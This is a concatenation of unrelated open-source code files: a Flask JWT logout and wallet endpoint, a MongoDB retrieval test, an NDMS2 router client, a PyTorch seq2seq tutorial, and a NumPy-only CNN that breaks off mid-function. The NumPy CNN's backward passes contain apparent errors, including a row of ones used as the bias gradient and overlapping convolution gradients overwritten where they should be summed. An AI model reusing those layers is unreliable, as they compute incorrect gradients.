auth_token = parser_args.Authorization
try:
User.decode_auth_token(auth_token)
blacklist_token = BlacklistToken(token=auth_token)
db.session.add(blacklist_token)
db.session.commit()
return {'status': 'success', 'message': 'Successfully logged out.'}, 201
except jwt.ExpiredSignatureError:
return {"message": "Signature expired. Please log in again."}, 401
except jwt.InvalidTokenError:
return {"message": "Invalid token. Please log in again."}, 401
@api.route('/wallet/<int:user_id>')
class WalletResource(Resource):
"""User Wallet Resource."""
@api.doc('user_wallet')
@api.response(code=200, model=wallet_model, description='Success')
@api.response(code=404, model=error_model, description='User Not Found')
@api.response(code=403, model=error_model, description='User Blocked')
def get(self, user_id):
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
response = {"address": user.wallet_address}
return response, 200
``` |
{
"source": "755452800/matminer",
"score": 2
} |
#### File: data_retrieval/tests/test_retrieve_MongoDB.py
```python
import unittest
from pymongo import MongoClient
from pymatgen.util.testing import PymatgenTest
from matminer.data_retrieval.retrieve_MongoDB import clean_projection, remove_ints, MongoDataRetrieval
from matminer.data_retrieval.tests.base import on_ci
class MongoDataRetrievalTest(PymatgenTest):
def test_cleaned_projection(self):
p = ["n.o.e", "n.o.e.l", "a.b", "a.b.c", "m", "m.b"]
result = clean_projection(p)
self.assertEqual(set(result), {"a.b", "m", "n.o.e"})
p = ["d.x", "d.y", "d.z", "a.b.c", "a.b.d.e", "m.n.x", "m.l.x"]
result = clean_projection(p)
self.assertEqual(set(result), {"d", "a.b", "m"})
def test_remove_ints(self):
self.assertEqual(remove_ints("a.1"), "a")
self.assertEqual(remove_ints("a.1.x"), "a.x")
@unittest.skipIf(not on_ci, "MongoDataRetrievalTest configured only to run on CI by default")
def test_get_dataframe(self):
db = MongoClient("localhost", 27017, username="admin", password="password").test_db
c = db.test_collection
docs = [
{
"some": {"nested": {"result": 14.5}},
"other": "notnestedresult",
"final": 16.938475 + i,
"array": [1.4, 5.6, 11.2, 1.1],
"valid": True,
}
for i in range(5)
]
docs[-1]["valid"] = False
c.insert_many(docs)
mdr = MongoDataRetrieval(c)
df = mdr.get_dataframe(
criteria={"valid": True}, properties=["some.nested.result", "other", "final", "array", "valid"]
)
self.assertTrue((df["some.nested.result"] == 14.5).all())
self.assertTrue((df["other"] == "notnestedresult").all())
floats = df["final"] != 16.938475
self.assertTrue(floats.any() and not floats.all())
self.assertArrayAlmostEqual(df["array"].iloc[0], [1.4, 5.6, 11.2, 1.1])
self.assertTrue(df["valid"].all())
c.drop()
``` |
{
"source": "755/python_ndms2_client",
"score": 3
} |
#### File: python_ndms2_client/ndms2_client/client.py
```python
import logging
import re
from collections import namedtuple
from typing import Dict, List
from .connection import Connection
_LOGGER = logging.getLogger(__name__)
_ARP_CMD = 'show ip arp'
_ASSOCIATIONS_CMD = 'show associations'
_HOTSPOT_CMD = 'show ip hotspot'
_INTERFACE_CMD = 'show interface %s'
_ARP_REGEX = re.compile(
r'(?P<name>([^ ]+))?\s+' +
r'(?P<ip>([0-9]{1,3}[.]){3}[0-9]{1,3})?\s+' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))\s+' +
r'(?P<interface>([^ ]+))\s+'
)
Device = namedtuple('Device', ['mac', 'name', 'ip', 'interface'])
class Client(object):
def __init__(self, connection: Connection):
self._connection = connection
def get_devices(self, include_arp=True, include_associated=True) -> List[Device]:
devices = []
if include_arp:
devices = _merge_devices(devices, self.get_arp_devices())
if include_associated:
devices = _merge_devices(devices, self.get_associated_devices())
return devices
def get_arp_devices(self) -> List[Device]:
lines = self._connection.run_command(_ARP_CMD)
result = _parse_table_lines(lines, _ARP_REGEX)
return [Device(
mac=info.get('mac').upper(),
name=info.get('name'),
ip=info.get('ip'),
interface=info.get('interface')
) for info in result if info.get('mac') is not None]
def get_associated_devices(self):
associations = _parse_dict_lines(self._connection.run_command(_ASSOCIATIONS_CMD))
items = associations.get('station', [])
if not isinstance(items, list):
items = [items]
aps = set([info.get('ap') for info in items])
ap_to_bridge = {}
for ap in aps:
ap_info = _parse_dict_lines(self._connection.run_command(_INTERFACE_CMD % ap))
ap_to_bridge[ap] = ap_info.get('group') or ap_info.get('interface-name')
hotspot_info = self.__get_hotpot_info()
devices = []
for info in items:
mac = info.get('mac')
if mac is not None and info.get('authenticated') in ['1', 'yes']:
host_info = hotspot_info.get(mac)
devices.append(Device(
mac=mac.upper(),
name=host_info.get('name') if host_info else None,
ip=host_info.get('ip') if host_info else None,
interface=ap_to_bridge.get(info.get('ap'), info.get('ap'))
))
return devices
# hotspot info is only available in newest firmware
# however on older firmware missing command error will lead to empty dict returned
def __get_hotpot_info(self):
info = _parse_dict_lines(self._connection.run_command(_HOTSPOT_CMD))
items = info.get('host', [])
if not isinstance(items, list):
items = [items]
return {item.get('mac'): item for item in items}
def _merge_devices(left: List[Device], right: List[Device]) -> List[Device]:
existing_macs = set([d.mac for d in left])
return left + [d for d in right if d.mac not in existing_macs]
def _parse_table_lines(lines: List[str], regex: re) -> List[Dict[str, any]]:
"""Parse the lines using the given regular expression.
If a line can't be parsed it is logged and skipped in the output.
"""
results = []
for line in lines:
match = regex.search(line)
if not match:
_LOGGER.debug("Could not parse line: %s", line)
continue
results.append(match.groupdict())
return results
def _parse_dict_lines(lines: List[str]) -> Dict[str, any]:
response = {}
stack = [(None, response)]
stack_level = 0
indent = 0
for line in lines:
if len(line.strip()) == 0:
continue
# exploding the line
colon_pos = line.index(':')
comma_pos = line.index(',') if ',' in line else None
key = line[:colon_pos].strip()
value = line[(colon_pos + 1):].strip()
new_indent = comma_pos if comma_pos is not None and comma_pos < colon_pos else colon_pos
# assuming line is like 'mac-access, id = Bridge0: ...'
if comma_pos is not None and comma_pos < colon_pos:
key = line[:comma_pos].strip()
value = {key: value} if value != '' else {}
args = line[comma_pos + 1:colon_pos].split(',')
for arg in args:
sub_key, sub_value = [p.strip() for p in arg.split('=', 1)]
value[sub_key] = sub_value
# up and down the stack
if new_indent > indent: # new line is a sub-value of parent
stack_level += 1
stack.append(None)
elif new_indent < indent: # getting one level up
stack_level -= 1
stack.pop()
if stack_level < 1:
break
indent = new_indent
stack[stack_level] = key, value
# current containing object
obj_key, obj = stack[stack_level - 1]
# we are the first child of the containing object
if not isinstance(obj, dict):
# need to convert it from empty string to empty object
assert obj == ''
_, parent_obj = stack[stack_level - 2]
obj = {}
# containing object might be in a list also
if isinstance(parent_obj[obj_key], list):
parent_obj[obj_key].pop()
parent_obj[obj_key].append(obj)
else:
parent_obj[obj_key] = obj
stack[stack_level - 1] = obj_key, obj
# current key is already in object means there should be an array of values
if key in obj:
if not isinstance(obj[key], list):
obj[key] = [obj[key]]
obj[key].append(value)
else:
obj[key] = value
return response
``` |
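`Client` only ever calls `run_command` on the connection it is given, so a stub connection returning canned CLI output is enough to exercise the parsing. A minimal sketch, assuming the package import path matches the file header above; the sample `show ip arp` line is invented but shaped to match `_ARP_REGEX` (name, IP, lowercase MAC, interface, trailing whitespace).
```python
# Sketch with a fake connection; not part of the library.
from ndms2_client.client import Client

class FakeConnection:
    def run_command(self, command):
        if command == 'show ip arp':
            return ['my-laptop   192.168.1.10   aa:bb:cc:dd:ee:ff   Bridge0   ']
        return []

client = Client(FakeConnection())
for device in client.get_arp_devices():
    print(device.mac, device.ip, device.interface)  # AA:BB:CC:DD:EE:FF 192.168.1.10 Bridge0
```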
{
"source": "7568/7568.github.io",
"score": 2
} |
#### File: codes/text-process/2021-11-13-seq2seqModel-paddedSequences-masking.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torchtext.datasets import Multi30k
from torchtext.data import Field, BucketIterator
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import spacy
import numpy as np
import random
import math
import time
import os
os.environ["CUDA_VISIBLE_DEVICES"]='1'
SEED = 1234
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
spacy_de = spacy.load('de_core_news_sm')
spacy_en = spacy.load('en_core_web_sm')
def tokenize_de(text):
"""
Tokenizes German text from a string into a list of strings
"""
return [tok.text for tok in spacy_de.tokenizer(text)]
def tokenize_en(text):
"""
Tokenizes English text from a string into a list of strings
"""
return [tok.text for tok in spacy_en.tokenizer(text)]
SRC = Field(tokenize = tokenize_de,
init_token = '<sos>',
eos_token = '<eos>',
lower = True,
include_lengths = True)
TRG = Field(tokenize = tokenize_en,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
train_data, valid_data, test_data = Multi30k.splits(exts = ('.de', '.en'),
fields = (SRC, TRG))
SRC.build_vocab(train_data, min_freq = 2)
TRG.build_vocab(train_data, min_freq = 2)
BATCH_SIZE = 128
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
train_iterator, valid_iterator, test_iterator = BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
sort_within_batch = True,
sort_key = lambda x : len(x.src),
device = device)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout):
super().__init__()
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.GRU(emb_dim, enc_hid_dim, bidirectional=True)
self.fc = nn.Linear(enc_hid_dim * 2, dec_hid_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, src, src_len):
# src = [src len, batch size]
# src_len = [batch size]
embedded = self.dropout(self.embedding(src))
# embedded = [src len, batch size, emb dim]
# need to explicitly put lengths on cpu!
packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, src_len.to('cpu'))
packed_outputs, hidden = self.rnn(packed_embedded)
# packed_outputs is a packed sequence containing all hidden states
# hidden is now from the final non-padded element in the batch
outputs, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs)
# outputs is now a non-packed sequence, all hidden states obtained
# when the input is a pad token are all zeros
# outputs = [src len, batch size, hid dim * num directions]
# hidden = [n layers * num directions, batch size, hid dim]
# hidden is stacked [forward_1, backward_1, forward_2, backward_2, ...]
# outputs are always from the last layer
# hidden [-2, :, : ] is the last of the forwards RNN
# hidden [-1, :, : ] is the last of the backwards RNN
# initial decoder hidden is final hidden state of the forwards and backwards
# encoder RNNs fed through a linear layer
hidden = torch.tanh(self.fc(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)))
# outputs = [src len, batch size, enc hid dim * 2]
# hidden = [batch size, dec hid dim]
return outputs, hidden
class Attention(nn.Module):
def __init__(self, enc_hid_dim, dec_hid_dim):
super().__init__()
self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)
self.v = nn.Linear(dec_hid_dim, 1, bias=False)
def forward(self, hidden, encoder_outputs, mask):
# hidden = [batch size, dec hid dim]
# encoder_outputs = [src len, batch size, enc hid dim * 2]
batch_size = encoder_outputs.shape[1]
src_len = encoder_outputs.shape[0]
# repeat decoder hidden state src_len times
hidden = hidden.unsqueeze(1).repeat(1, src_len, 1)
encoder_outputs = encoder_outputs.permute(1, 0, 2)
# hidden = [batch size, src len, dec hid dim]
# encoder_outputs = [batch size, src len, enc hid dim * 2]
energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim=2)))
# energy = [batch size, src len, dec hid dim]
attention = self.v(energy).squeeze(2)
# attention = [batch size, src len]
attention = attention.masked_fill(mask == 0, -1e10)
return F.softmax(attention, dim=1)
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout, attention):
super().__init__()
self.output_dim = output_dim
self.attention = attention
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim)
self.fc_out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, encoder_outputs, mask):
# input = [batch size]
# hidden = [batch size, dec hid dim]
# encoder_outputs = [src len, batch size, enc hid dim * 2]
# mask = [batch size, src len]
input = input.unsqueeze(0)
# input = [1, batch size]
embedded = self.dropout(self.embedding(input))
# embedded = [1, batch size, emb dim]
a = self.attention(hidden, encoder_outputs, mask)
# a = [batch size, src len]
a = a.unsqueeze(1)
# a = [batch size, 1, src len]
encoder_outputs = encoder_outputs.permute(1, 0, 2)
# encoder_outputs = [batch size, src len, enc hid dim * 2]
weighted = torch.bmm(a, encoder_outputs)
# weighted = [batch size, 1, enc hid dim * 2]
weighted = weighted.permute(1, 0, 2)
# weighted = [1, batch size, enc hid dim * 2]
rnn_input = torch.cat((embedded, weighted), dim=2)
# rnn_input = [1, batch size, (enc hid dim * 2) + emb dim]
output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))
# output = [seq len, batch size, dec hid dim * n directions]
# hidden = [n layers * n directions, batch size, dec hid dim]
# seq len, n layers and n directions will always be 1 in this decoder, therefore:
# output = [1, batch size, dec hid dim]
# hidden = [1, batch size, dec hid dim]
# this also means that output == hidden
assert (output == hidden).all()
embedded = embedded.squeeze(0)
output = output.squeeze(0)
weighted = weighted.squeeze(0)
prediction = self.fc_out(torch.cat((output, weighted, embedded), dim=1))
# prediction = [batch size, output dim]
return prediction, hidden.squeeze(0), a.squeeze(1)
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, src_pad_idx, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.src_pad_idx = src_pad_idx
self.device = device
def create_mask(self, src):
mask = (src != self.src_pad_idx).permute(1, 0)
return mask
def forward(self, src, src_len, trg, teacher_forcing_ratio=0.5):
# src = [src len, batch size]
# src_len = [batch size]
# trg = [trg len, batch size]
# teacher_forcing_ratio is probability to use teacher forcing
# e.g. if teacher_forcing_ratio is 0.75 we use teacher forcing 75% of the time
batch_size = src.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
# tensor to store decoder outputs
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
# encoder_outputs is all hidden states of the input sequence, back and forwards
# hidden is the final forward and backward hidden states, passed through a linear layer
encoder_outputs, hidden = self.encoder(src, src_len)
# first input to the decoder is the <sos> tokens
input = trg[0, :]
mask = self.create_mask(src)
# mask = [batch size, src len]
for t in range(1, trg_len):
# insert input token embedding, previous hidden state, all encoder hidden states
# and mask
# receive output tensor (predictions) and new hidden state
output, hidden, _ = self.decoder(input, hidden, encoder_outputs, mask)
# place predictions in a tensor holding predictions for each token
outputs[t] = output
# decide if we are going to use teacher forcing or not
teacher_force = random.random() < teacher_forcing_ratio
# get the highest predicted token from our predictions
top1 = output.argmax(1)
# if teacher forcing, use actual next token as next input
# if not, use predicted token
input = trg[t] if teacher_force else top1
return outputs
INPUT_DIM = len(SRC.vocab)
OUTPUT_DIM = len(TRG.vocab)
ENC_EMB_DIM = 256
DEC_EMB_DIM = 256
ENC_HID_DIM = 512
DEC_HID_DIM = 512
ENC_DROPOUT = 0.5
DEC_DROPOUT = 0.5
SRC_PAD_IDX = SRC.vocab.stoi[SRC.pad_token]
attn = Attention(ENC_HID_DIM, DEC_HID_DIM)
enc = Encoder(INPUT_DIM, ENC_EMB_DIM, ENC_HID_DIM, DEC_HID_DIM, ENC_DROPOUT)
dec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, ENC_HID_DIM, DEC_HID_DIM, DEC_DROPOUT, attn)
model = Seq2Seq(enc, dec, SRC_PAD_IDX, device).to(device)
def init_weights(m):
for name, param in m.named_parameters():
if 'weight' in name:
nn.init.normal_(param.data, mean=0, std=0.01)
else:
nn.init.constant_(param.data, 0)
model.apply(init_weights)
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f'The model has {count_parameters(model):,} trainable parameters')
optimizer = optim.Adam(model.parameters())
TRG_PAD_IDX = TRG.vocab.stoi[TRG.pad_token]
criterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)
def train(model, iterator, optimizer, criterion, clip):
model.train()
epoch_loss = 0
for i, batch in enumerate(iterator):
src, src_len = batch.src
trg = batch.trg
optimizer.zero_grad()
output = model(src, src_len, trg)
# trg = [trg len, batch size]
# output = [trg len, batch size, output dim]
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
# trg = [(trg len - 1) * batch size]
# output = [(trg len - 1) * batch size, output dim]
loss = criterion(output, trg)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def evaluate(model, iterator, criterion):
model.eval()
epoch_loss = 0
with torch.no_grad():
for i, batch in enumerate(iterator):
src, src_len = batch.src
trg = batch.trg
output = model(src, src_len, trg, 0) # turn off teacher forcing
# trg = [trg len, batch size]
# output = [trg len, batch size, output dim]
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
# trg = [(trg len - 1) * batch size]
# output = [(trg len - 1) * batch size, output dim]
loss = criterion(output, trg)
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
N_EPOCHS = 10
CLIP = 1
best_valid_loss = float('inf')
is_train = False
if is_train:
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss = train(model, train_iterator, optimizer, criterion, CLIP)
valid_loss = evaluate(model, valid_iterator, criterion)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), 'tut4-model.pt')
print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')
print(f'\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}')
model.load_state_dict(torch.load('tut4-model.pt'))
test_loss = evaluate(model, test_iterator, criterion)
print(f'| Test Loss: {test_loss:.3f} | Test PPL: {math.exp(test_loss):7.3f} |')
def translate_sentence(sentence, src_field, trg_field, model, device, max_len=50):
model.eval()
if isinstance(sentence, str):
        nlp = spacy.load('de_core_news_sm')
tokens = [token.text.lower() for token in nlp(sentence)]
else:
tokens = [token.lower() for token in sentence]
tokens = [src_field.init_token] + tokens + [src_field.eos_token]
src_indexes = [src_field.vocab.stoi[token] for token in tokens]
src_tensor = torch.LongTensor(src_indexes).unsqueeze(1).to(device)
src_len = torch.LongTensor([len(src_indexes)])
with torch.no_grad():
encoder_outputs, hidden = model.encoder(src_tensor, src_len)
mask = model.create_mask(src_tensor)
trg_indexes = [trg_field.vocab.stoi[trg_field.init_token]]
attentions = torch.zeros(max_len, 1, len(src_indexes)).to(device)
for i in range(max_len):
trg_tensor = torch.LongTensor([trg_indexes[-1]]).to(device)
with torch.no_grad():
output, hidden, attention = model.decoder(trg_tensor, hidden, encoder_outputs, mask)
attentions[i] = attention
pred_token = output.argmax(1).item()
trg_indexes.append(pred_token)
if pred_token == trg_field.vocab.stoi[trg_field.eos_token]:
break
trg_tokens = [trg_field.vocab.itos[i] for i in trg_indexes]
return trg_tokens[1:], attentions[:len(trg_tokens) - 1]
def display_attention(sentence, translation, attention):
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111)
attention = attention.squeeze(1).cpu().detach().numpy()
cax = ax.matshow(attention, cmap='bone')
ax.tick_params(labelsize=15)
x_ticks = [''] + ['<sos>'] + [t.lower() for t in sentence] + ['<eos>']
y_ticks = [''] + translation
ax.set_xticklabels(x_ticks, rotation=45)
ax.set_yticklabels(y_ticks)
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.show()
plt.close()
example_idx = 12
src = vars(train_data.examples[example_idx])['src']
trg = vars(train_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
example_idx = 14
src = vars(valid_data.examples[example_idx])['src']
trg = vars(valid_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
example_idx = 18
src = vars(test_data.examples[example_idx])['src']
trg = vars(test_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
from torchtext.data.metrics import bleu_score
def calculate_bleu(data, src_field, trg_field, model, device, max_len=50):
trgs = []
pred_trgs = []
for datum in data:
src = vars(datum)['src']
trg = vars(datum)['trg']
pred_trg, _ = translate_sentence(src, src_field, trg_field, model, device, max_len)
# cut off <eos> token
pred_trg = pred_trg[:-1]
pred_trgs.append(pred_trg)
trgs.append([trg])
return bleu_score(pred_trgs, trgs)
bleu_score_ = calculate_bleu(test_data, SRC, TRG, model, device)
print(f'BLEU score = {bleu_score_*100:.2f}')
``` |
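The two ideas this script adds over a plain seq2seq model are packed padded sequences in the encoder and masking of `<pad>` positions in the attention. The following is a self-contained toy sketch of both tricks on small tensors, independent of the model classes above; shapes follow the script's `[src len, batch size]` convention.
```python
# Toy tensors only; illustrates pack_padded_sequence / pad_packed_sequence and masked softmax.
import torch
import torch.nn as nn
import torch.nn.functional as F

pad_idx = 0
src = torch.tensor([[5, 7, 2],          # [src len, batch size], 0 is the <pad> index
                    [6, 3, 0],
                    [4, 0, 0]])
src_len = torch.tensor([3, 2, 1])        # true lengths, sorted in decreasing order

emb = nn.Embedding(10, 8, padding_idx=pad_idx)
rnn = nn.GRU(8, 16)

packed = nn.utils.rnn.pack_padded_sequence(emb(src), src_len.to('cpu'))
packed_out, hidden = rnn(packed)
outputs, _ = nn.utils.rnn.pad_packed_sequence(packed_out)   # pad positions come back as zeros

# attention masking: pad positions get -1e10 before the softmax, so they receive ~0 weight
scores = torch.randn(3, 3)                # [batch size, src len]
mask = (src != pad_idx).permute(1, 0)     # [batch size, src len]
attention = F.softmax(scores.masked_fill(mask == 0, -1e10), dim=1)
print(attention)
```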
{
"source": "7568/examples",
"score": 3
} |
#### File: w7-v2/no_pytorch/data_iter.py
```python
import random
class IrisDataIter:
"""
迭代器
"""
def __init__(self, m, bach):
random.shuffle(m)
self.data = m
self.bach = bach
self.length = len(m)
self.index = -1
def __iter__(self):
return self
def __next__(self):
if self.index < self.length - 1:
self.index += 1
_start = self.index * self.bach
if _start >= self.length:
raise StopIteration
_end = (self.index + 1) * self.bach
if _end > self.length:
_end = self.length
                _start = _end - self.bach  # for the last batch, just take the last 'bach' elements
_train_index = self.data[_start: _end]
return _train_index
else:
raise StopIteration
```
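A short usage sketch of the iterator above: it shuffles the index list in place and yields `bach` indices per step, with the last step re-using the final `bach` elements so every batch has the same size.
```python
# Illustrative only: ten sample indices, batches of four.
indices = list(range(10))
for batch_indices in IrisDataIter(indices, 4):
    print(batch_indices)   # three batches of 4 shuffled indices
```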
#### File: w7-v2/no_pytorch/my_first_cnn.py
```python
import numpy as np
import time
class BasicModule(object):
l_r = 0
def __init__(self):
raise NotImplementedError
def forward(self, x_i):
raise NotImplementedError
def backward(self, grad_H):
raise NotImplementedError
class LinearLayer(BasicModule):
def __init__(self, input_num, output_num):
"""
        Linear (fully connected) layer: implements the matrix product of X and W.
        :param input_num: number of inputs per neuron, i.e. the feature dimension of the input
        :param output_num: number of neurons in this layer
"""
self.prev_data = None
self.input_num = input_num
self.output_num = output_num
# W : weight + bias , weight:length of feature x output number , bias:1 x output number
self.W = np.random.normal(0, 1, (input_num + 1, output_num)) / np.sqrt((input_num + 1) / 2)
def forward(self, prev_data):
"""
:param prev_data: row:length of feature , column: bach
:return:
"""
self.prev_data = prev_data
prev_data_new = np.concatenate((prev_data, np.ones((1, prev_data.shape[1]))), axis=0)
H = self.W.T @ prev_data_new
return H
def backward(self, grad):
new_grad = self.W @ grad
grad_w = self.prev_data @ grad.T
grad_w = np.concatenate((grad_w, np.ones((1, grad_w.shape[1]))), axis=0)
self.W -= BasicModule.l_r * (grad_w / self.prev_data.shape[1])
return new_grad[0:-1, :] # , grad_W
class Conv2d(BasicModule):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0):
"""
        2D convolution layer. For simplicity of the computation the stride is fixed to 1.
        :param in_channels: number of input channels
        :param out_channels: number of output channels (filters)
"""
self.last_input = None
self.input = None
self.output = None
self.input_padded = None
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.filters = np.random.randn(out_channels, in_channels, kernel_size, kernel_size) / (kernel_size ** 2)
self.filters2 = self.filters
self.filters = self.filters.flatten()
self.filters = self.filters.reshape(out_channels, in_channels * kernel_size * kernel_size)
self.filters3 = self.filters.reshape(1,out_channels, in_channels * kernel_size * kernel_size)
self.bias = None
def forward(self, input, filters=None):
"""
        input has shape (b, n, h, w); when convolving the input with the filters, the
        convolution is rewritten as a matrix multiplication over flattened patches (im2col).
:param input:
:param filters:
:return:
"""
self.input = input
input_padded = np.pad(input, ((0, 0), (0, 0), (self.padding, self.padding), (self.padding, self.padding)),
'constant')
self.input_padded = input_padded
b0, n0, h0, w0 = input_padded.shape
out_size = (np.array([h0, w0]) - self.kernel_size + 1) / self.stride
output = np.zeros((b0, self.out_channels, int(out_size[0]), int(out_size[1])))
list_flatted_input = list()
row_numbers = int(out_size[0]) * int(out_size[1])
for h in range(int(out_size[0])):
for w in range(int(out_size[1])):
x_slice = input_padded[:, :, h * self.stride:h * self.stride + self.kernel_size,
w * self.stride:w * self.stride + self.kernel_size]
list_flatted_input.append(x_slice)
flatted_input2 = np.asarray(list_flatted_input).reshape(row_numbers, b0,
self.in_channels * self.kernel_size * self.kernel_size)
flatted_input = np.swapaxes(flatted_input2, 0, 1)
self.last_input = flatted_input
_output = np.zeros((b0, self.out_channels, flatted_input.shape[1]))
if self.bias is None:
self.bias = np.random.randn(self.out_channels, row_numbers)
#
for bb in range(b0):
_output[bb, :, :] = self.filters @ flatted_input[bb, :, :].T
output = _output.reshape(b0, self.out_channels, int(out_size[0]), int(out_size[1]))
return output
def backward(self, grad_pre):
'''
:param grad_pre:
:return:
'''
# xb, xn, xh, xw = self.input.shape
        # since the forward convolution was implemented as a matrix multiplication, first reshape grad_pre to match the layout of flatted_input
o, c, h, w = grad_pre.shape
grad_pre = grad_pre.reshape((o, c, h * w))
dF = np.zeros(self.filters.shape)
db = np.zeros(self.bias.shape)
_dX = np.zeros(self.last_input.shape)
for bb in range(o):
dF += grad_pre[bb, :, :] @ self.last_input[bb, :, :]
db += grad_pre[bb, :, :]
_dX[bb, :, :] = (self.filters.T @ grad_pre[bb, :, :]).T
self.filters -= BasicModule.l_r * dF / o
self.bias -= BasicModule.l_r * db / o
        # remove the duplicated entries in _dX: mirror the convolution, but instead of extracting patches step by step, put the patches from _dX back into place step by step
pb, pn, ph, pw = self.input_padded.shape
dX = np.zeros(self.input.shape)
out_size = (np.array([ph, pw]) - self.kernel_size + 1) / self.stride
padding_x2 = np.zeros((pb, pn, ph, pw))
_dX2 = np.swapaxes(_dX, 0, 1)
count = 0
for h in range(int(out_size[0])):
for w in range(int(out_size[1])):
k = _dX2[count, :, :].reshape(pb, self.in_channels, self.kernel_size, self.kernel_size)
padding_x2[:, :, h * self.stride:h * self.stride + self.kernel_size,
w * self.stride:w * self.stride + self.kernel_size] = k
count += 1
padding_x = padding_x2
        # strip off the padded border
dX[:, :, :, :] = padding_x[:, :, self.padding:ph - self.padding, self.padding:pw - self.padding]
return dX
class Flatting(BasicModule):
def __init__(self):
"""
        Flatten the input into a (features, batch) matrix.
"""
self.prev_data = None
def forward(self, prev_data):
self.prev_data = prev_data
flated = prev_data.flatten()
flated = flated.reshape(prev_data.shape[0], int(flated.shape[0] / prev_data.shape[0]))
return flated.T
def backward(self, grad_b):
"""
:param grad_b: row : features number , column : bach size
:return:
"""
grad_b = grad_b.T
grad_b = grad_b.reshape(self.prev_data.shape)
return grad_b
class Relu(BasicModule):
def __init__(self):
self.prev_data = None
self.filter = None
def forward(self, prev_data):
self.prev_data = prev_data
self.filter = (prev_data > 0).astype(np.float32)
        # result = np.where(prev_data > 0, prev_data, np.zeros_like(prev_data))
result = self.filter * prev_data
return result
def backward(self, grad_b):
result = self.filter * grad_b
return result
class MaxPool2d(BasicModule):
def __init__(self, kernel_size):
self.kernel_size = kernel_size
self.output = None
self.max_pool_for_back = None
def forward(self, prev_data):
self.prev_data = prev_data
bach, num_filters, h, w = prev_data.shape
k_s = self.kernel_size
if h % k_s != 0 or w % k_s != 0:
            print('MaxPool2d: input size is not divisible by the kernel size!')
new_h = h // k_s
new_w = w // k_s
        # first gather the blocks to compare, flatten each into a vector, then take the maximum of each vector
max_indexs = list()
for i in range(new_h):
for j in range(new_w):
im_region = prev_data[:, :, (i * k_s):(i * k_s + k_s), (j * k_s):(j * k_s + k_s)]
max_indexs.append(im_region)
row_number = bach * num_filters * new_h * new_w
max_pool_for_back2 = np.asarray(max_indexs).reshape(row_number, k_s ** 2)
max_index2 = np.concatenate((np.arange(row_number), np.argmax(max_pool_for_back2, axis=1))).reshape(2,
row_number)
max_index2 = tuple(max_index2)
max_index3 = max_pool_for_back2[max_index2]
max_index3 = max_index3.reshape(new_h, new_w, num_filters * bach)
max_index3 = np.swapaxes(max_index3, 1, 2)
max_index3 = np.swapaxes(max_index3, 0, 1)
max_index3 = max_index3.reshape(bach, num_filters, new_h, new_w, )
output = max_index3
        # record the positions of the maxima so they can be reused in the backward pass
